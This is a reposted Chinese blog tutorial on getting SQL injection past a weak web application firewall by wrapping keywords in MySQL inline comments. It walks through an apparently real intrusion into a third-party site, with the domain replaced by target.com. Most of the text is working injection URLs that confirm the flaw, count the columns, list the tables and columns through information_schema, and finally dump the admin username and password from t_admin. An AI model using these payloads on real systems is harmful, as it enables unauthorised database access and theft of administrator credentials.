bypass waf入门之sql注入 [ 内联注释篇 ]

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了bypass waf入门之sql注入 [ 内联注释篇 ]相关的知识,希望对你有一定的参考价值。


0x01 前言


昨天在搞一个目标的旁站时凑巧又碰到了waf,当然啦,这个waf比较弱,基本是弱到没朋友的那种,但为了博客的完整性,这里还是顺便就记录一下,留给有需要的朋友,方法非常简单,关于bypass waf的东西其实特别多,这里暂时只提一种,”内联注释”,招数早已经烂大街了,后续再遇到其它的bypass实例,也会继续更新到博客上,废话少说,看实例吧:


0x02 依旧是先判断注入点是否存在,很显然,’and’没有拦


http://www.target.com/news/show1.php?id=1102 And 1212=1212  返回正常

http://www.target.com/news/show1.php?id=1102 And 1212=121   返回异常,注入存在


bypass waf入门之sql注入 [ 内联注释篇 ]



bypass waf入门之sql注入 [ 内联注释篇 ]


0x03 我们观察到,当字段个数为11的时候页面返回正常,说明当前表字段个数为11个,’order by’ 也没有拦,到这里为止,凭着一点经验自己心里就有种感觉,这个waf肯定非常好过,接着往下看吧


http://www.target.com/news/show1.php?id=1102 OrDer by 11


bypass waf入门之sql注入 [ 内联注释篇 ]



0x04 开始搜集信息,这时我们发现waf似乎开始起作用了,拦了我们的内置函数


http://www.target.com/news/show1.php?id=1102 And 1=12 +UNION+ALL+SELECT+1,2,user(),version(),database(),6,7,8,9,10,11 --+-


bypass waf入门之sql注入 [ 内联注释篇 ]


0x05 既然拦了函数,咱们就把函数给注释一下看看,然后就这么容易的通过了[以为还要折腾很久],好吧,既然它对这种内联注释感冒,那后面我就把所有的关键字都用这种方式包起来,省的我一个个猜它到底拦哪个


http://www.target.com/news/show1.php?id=1102 And 1=12 +UNION+ALL+SELECT+1,2,/*!user()*/,version(),database(),6,7,8,9,10,11 --+-


bypass waf入门之sql注入 [ 内联注释篇 ]


0x06 查询当前库中的所有表,这类我们看到了’t_admin’这张管理表


http://www.target.com/news/show1.php?id=1102 aNd 1=12 +/*!UNION+ALL+SELECT*/+1,2,/*!group_concat(table_name)*/,/*!version()*/,/*!database()*/,6,7,8,9,10,11 from /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=0x686e797075686b315f7363686f6f6c --+-


bypass waf入门之sql注入 [ 内联注释篇 ]


0x07 查询’t_admin’表中的所有字段名,如下


http://www.target.com/news/show1.php?id=1102 ANd 1=12 +/*!UNION+ALL+SELECT*/+1,2,/*!group_concat(column_name)*/,/*!version()*/,/*!database()*/,6,7,8,9,10,11 from /*!information_schema.columns*/ /*!where*/ /*!table_name*/=0x745f61646d696e --+-


bypass waf入门之sql注入 [ 内联注释篇 ]

0x08 就剩最后一步了,查出管理员的账号密码即可


http://www.target.com/news/show1.php?id=1102 anD 1=12 +/*!UNION+ALL+SELECT*/+1,2,/*!admin_name*/,/*!admin_password*/,5,6,7,8,9,10,11 from /*!t_admin*/ /*!limit*/ 0,1--+-


bypass waf入门之sql注入 [ 内联注释篇 ]


小结:


没啥实际的技术含量,只是为了博客完整性稍作记录而已,关于bypass waf后续还会有很多的篇幅来说明,待续…


原文链接:https://klionsec.github.io/2016/05/20/bypass-waf-note/

文章来源:klion's blog

以上是关于bypass waf入门之sql注入 [ 内联注释篇 ]的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入bypass学习

sql注入系列之(bypass waf 2)

Bypass X-WAF SQL注入防御(多姿势)

关于《WAF攻防之SQL注入篇》的回应

Bypass ngx_lua_waf SQL注入防御(多姿势)

Bypass ngx_lua_waf SQL注入防御(多姿势)